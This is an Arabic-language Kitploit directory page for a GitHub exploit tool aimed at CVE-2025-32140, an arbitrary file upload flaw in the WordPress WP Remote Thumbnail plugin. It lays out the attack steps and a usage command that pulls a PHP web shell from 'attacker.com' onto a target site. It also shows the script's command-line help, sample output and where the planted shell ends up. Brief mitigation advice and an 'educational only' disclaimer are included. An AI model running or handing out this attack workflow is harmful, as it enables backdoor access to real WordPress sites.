Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32140 — المكوّن الإضافي WordPress WP Remote Thumbnail Plugin <= 1.3.2 معرّض لثغرة رفع ملفات تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-32140
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-32140

CVE-2025-32140

المكوّن الإضافي WordPress WP Remote Thumbnail Plugin <= 1.3.2 معرّض لثغرة رفع ملفات تعسفي

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2025-32140 – استغلال WP Remote Thumbnail (رفع ملفات تعسّفي)


📝 الوصف

CVE-2025-32140 هو ثغرة حرجة في إضافة WP Remote Thumbnail الخاصة بووردبريس. تتيح هذه الثغرة للمهاجمين المُوثَّقين (بصلاحيات مساهم أو أعلى) رفع ملفات تعسّفية، مثل قشور الويب (web shells)، عبر إساءة استخدام ميزة معيبة تقبل عناوين URL غير مُنقّاة.

لا تتحقق الإضافة من نوع الملف أو محتواه الذي يتم جلبه من رابط remote_thumb المقدَّم، مما يسمح للمهاجمين بحفظ ملفات PHP خبيثة (مثل الأبواب الخلفية) في مجلد /wp-content/uploads.


⚠️ المكوّن المعرَّض للخطر

  • الإضافة: WP Remote Thumbnail
  • الإصدارات المصابة: <= 1.3.2
  • الإصدار المصحَّح: لم يُطرح بعد
  • متجه الهجوم: الشبكة
  • الصلاحيات المطلوبة: منخفضة (مستخدم موثّق لديه صلاحية edit_post)
  • درجة CVSS: 9.9 (حرجة)

🛠 سكربت الاستغلال

يعمل هذا السكربت المكتوب بلغة بايثون على أتمتة استغلال CVE-2025-32140 عبر الخطوات التالية:

  1. تسجيل الدخول إلى موقع ووردبريس المستهدف.
  2. استخراج الـ nonces المطلوبة تلقائيًا.
  3. إنشاء وإرسال طلب خبيث عبر معامل remote_thumb.
  4. رفع قشرة ويب (web shell) إلى الموقع المستهدف.

🔧 خيارات سطر الأوامر


🚀 الاستخدام

root@kitploit:~
python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 الاستخدام والمساعدة

root@kitploit:~

                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 مثال على المخرجات

root@kitploit:~
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 موقع القشرة

بمجرد استغلال الثغرة، من المرجح أن يتم تخزين قشرة الويب المرفوعة في:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

استبدل YYYY/MM بـ السنة والشهر الحاليين لتاريخ رفع الملف.


🛡 التوصيات

لتخفيف المخاطر الناتجة عن هذه الثغرة:

  1. حدّث الإضافة إلى أحدث إصدار (بمجرد إصدار التصحيح).
  2. قيّد صلاحيات رفع الملفات على المستخدمين الموثوقين فقط.
  3. عطّل ميزة جلب الصور المصغرة عن بُعد إذا لم تكن مطلوبة.

⚠️ إخلاء مسؤولية

هذا السكربت مقدَّم لأغراض تعليمية فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال.


👤 المؤلف

بواسطة: Nxploited ( Khaled Alenazi ) 🌟

تنزيل الأداة
الخيارالاسم المستعارالوصف
--url-uرابط موقع ووردبريس المستهدف (مثل http://target.com/wordpress)
--username-unاسم مستخدم ووردبريس بصلاحيات تحرير المقالات
--password-pكلمة المرور لاسم المستخدم المحدد
--user_ID-uidمعرف مستخدم ووردبريس (غالبًا 1 للمدير)
--post_ID-pidمعرف المقال الذي سيتم تحريره (يمكن أن يكون مسودة)
--shellرابط مباشر لقشرة ويب PHP مستضافة على خادم المهاجم